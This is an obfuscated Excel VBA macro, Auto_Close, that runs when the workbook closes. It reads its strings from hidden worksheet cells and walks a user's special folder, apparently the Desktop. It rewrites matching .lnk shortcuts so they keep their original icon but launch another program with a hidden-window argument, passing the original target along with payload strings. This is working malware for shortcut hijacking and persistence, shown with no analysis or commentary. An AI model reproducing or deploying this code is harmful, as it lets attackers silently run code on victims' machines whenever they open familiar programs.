Sub Auto_Close()
Set oqagwH = CreateObject(activeSheet.Range("AY57").value)
Set PqsNtmewS = CreateObject(activeSheet.Range("BC57").value)
Set dPEVXic = PqsNtmewS.GetFolder(oqagwH.SpecialFolders(activeSheet.Range("BE57").value))
For Each lmxzRwQ In dPEVXic.Files
If(InStr(Lcase(lmxzRwQ), ".lnk")) Then
Set GbOvydl = oqagwH.CreateShortcut(oqagwH.SPecialFolders(activeSheet.Range("BE57").value) & "\" & lmxzRwQ.name)
If(InStr(Lcase(GbOvydl.targetPath), activeSheet.Range("BI57").value) or InStr(Lcase(GbOvydl.targetPath), activeSheet.Range("BM57").value) or InStr(Lcase(GbOvydl.targetPath), activeSheet.Range("BO57").value)) Then
GbOvydl.IconLocation = GbOvydl.targetpath
GbOvydl.arguments = "-w " & activeSheet.Range("BP57").Value & GbOvydl.targetPath & "'" & activeSheet.Range("BR57").Value
GbOvydl.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BT57").value
if(Len(GbOvydl.arguments) < 1023) Then
GbOvydl.save
end if
end if
end if
next lmxzRwQ
End Sub
